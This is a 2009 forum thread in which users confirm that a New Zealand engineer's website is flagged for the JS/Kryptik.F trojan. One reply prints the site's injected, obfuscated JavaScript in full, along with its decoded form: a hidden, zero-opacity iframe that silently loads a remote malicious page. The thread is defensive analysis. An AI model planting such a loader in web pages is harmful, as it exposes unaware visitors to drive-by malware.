| Forum Home | ||||
| Press F1 | ||||
| Thread ID: 100444 | 2009-06-08 02:16:00 | Virus on web-page?? | notechyet (4479) | Press F1 |
| Post ID | Timestamp | Content | User | ||
| 780525 | 2009-06-08 02:16:00 | Hello I just wanted to check out an engineer and when I went to www. t f e l .co.nz/ web-site my Avast warned me of a Trojan horse virus being present. Would someone be able to verify this for me? Thanks |
notechyet (4479) | ||
| 780526 | 2009-06-08 02:32:00 | Clicked on your link, NOD32 also blocked it. 8/06/2009 1:31:06 p.m. HTTP filter file www. t f e l .co.nz JS/Kryptik.F virus connection terminated - quarantined ROB-NB\Rob Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe. |
Rob99 (151) | ||
| 780527 | 2009-06-08 02:41:00 | Hi Rob Thanks for testing! I'll contact the owner of the web-page as I sort-off know them. |
notechyet (4479) | ||
| 780528 | 2009-06-08 04:27:00 | Just a bit more Info -- Information On Infections (www.imagef1.net.nz) -- bottom right the name of the infection. | wainuitech (129) | ||
| 780529 | 2009-06-08 04:41:00 | Hmm, according to google thats what the torrent version of the Windows 7 beta had in it too. JS probably means it runs in / as part of javascript? | Speedy Gonzales (78) | ||
| 780530 | 2009-06-08 04:42:00 | Nice to know Avast also identified it, NOD sure does. | pctek (84) | ||
| 780531 | 2009-06-08 04:55:00 | Safari blocked it | plod (107) | ||
| 780532 | 2009-06-08 05:48:00 | The offending code is this: <script type="text/javascript">var hdOruVsHnKBXZuvtsRmw = "z60z105z102z114z97z109z101z32z119z105z100z116z104z 61z34z52z56z48z34z32z104z101z105z103z104z116z61z34 z54z48z34z32z115z114z99z61z34z104z116z116z112z58z4 7z47z114z110z119z46z107z122z47z105z110z100z101z120 z46z112z104z112z34z32z115z116z121z108z101z61z34z98 z111z114z100z101z114z58z48z112z120z59z32z112z111z1 15z105z116z105z111z110z58z114z101z108z97z116z105z1 18z101z59z32z116z111z112z58z48z112z120z59z32z108z1 01z102z116z58z45z53z48z48z112z120z59z32z111z112z97 z99z105z116z121z58z48z59z32z102z105z108z116z101z11 4z58z112z114z111z103z105z100z58z68z88z73z109z97z10 3z101z84z114z97z110z115z102z111z114z109z46z77z105z 99z114z111z115z111z102z116z46z65z108z112z104z97z40 z111z112z97z99z105z116z121z61z48z41z59z32z45z109z1 11z122z45z111z112z97z99z105z116z121z58z48z34z62z60 z47z105z102z114z97z109z101z62";var kWiFaYwHrXtZBIQvdJDR = hdOruVsHnKBXZuvtsRmw.split("z");var TEptzkmsBZolwWqWunem = "";for (var KYLMhcILlLcFQRyPBlHD=1; KYLMhcILlLcFQRyPBlHD<kWiFaYwHrXtZBIQvdJDR.length; KYLMhcILlLcFQRyPBlHD++){TEptzkmsBZolwWqWunem+=Stri ng.fromCharCode(kWiFaYwHrXtZBIQvdJDR[KYLMhcILlLcFQRyPBlHD]);}document.write(TEptzkmsBZolwWqWunem)</script> What it does is embed an invisible iframe in the page that points to [edited], resulting in that page loading without the user being aware of it. That page is probably the one containing the virus. Edit: For those interested in the unscrambled version of the above javascript, here it is (newlines & indentation added by me): <iframe width="480" height="60" src="rnw.kz style=" border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opa city=0); -moz-opacity:0 " > </iframe> |
Erayd (23) | ||
| 780533 | 2009-06-08 06:07:00 | Um guys, can you please not post clickable links to websites that contain viruses? I've broken the URLs up so they aren't clickable (from curious newbies), and edited out Erayd's link as it tried to load when I previewed his post - luckily avast caught it and stopped the page loading. |
Jen (38) | ||
| 780534 | 2009-06-08 06:25:00 | Oops.... good point, I didn't think of the implications there - just figured people would be interested in the dissection, rather than actually trying to click through to the nasties. Sorry! | Erayd (23) | ||
| 1 2 | |||||